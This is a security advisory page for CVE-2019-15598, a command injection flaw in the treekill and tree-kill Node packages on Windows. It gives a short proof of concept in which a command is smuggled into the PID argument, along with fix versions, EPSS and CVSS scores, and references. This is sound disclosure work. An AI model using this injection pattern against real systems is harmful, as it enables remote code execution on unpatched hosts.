CVE-2019-15598 — Treekill Enables OS Command Injection

Description

A Code Injection exists in treekill and tree-kill on Windows which allows a remote code execution when an attacker is able to control the input into the command. ### Steps To Reproduce: Create the following PoC file: ```js var kill = require('treekill'); kill('3333332 & echo "HACKED" > HACKED.txt & '); ``` Execute the following commands in terminal: ```shell npm i treekill # Install affected module dir # Check *HACKED.txt* doesn't exist node poc.js # Run the PoC dir # Now *HACKED.txt* exists :) ``` The HACKED.txt has been created

How to fix CVE-2019-15598

To remediate CVE-2019-15598, upgrade the affected package to a fixed version below.

—upgrade to 1.2.2 or later

Is CVE-2019-15598 being exploited?

Low — EPSS is 3.8%, meaning exploitation activity has not been observed at scale.

Affected packages (1)

from 0, < 1.2.2

CVSS scores

Source	Version	Severity	Vector
osv	CVSS 3.1	CRITICAL9.8	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References (9)

ADVISORYnvd.nist.gov/vuln/detail/CVE-2019-15598
PATCHgithub.com/pkrumins/node-tree-kill
WEBgithub.com/node-modules/treekill/blob/master/index.js#L32
WEBgithub.com/pkrumins/node-tree-kill/commit/ff73dbf144c4c2daa67799a50dfff59cd455c63c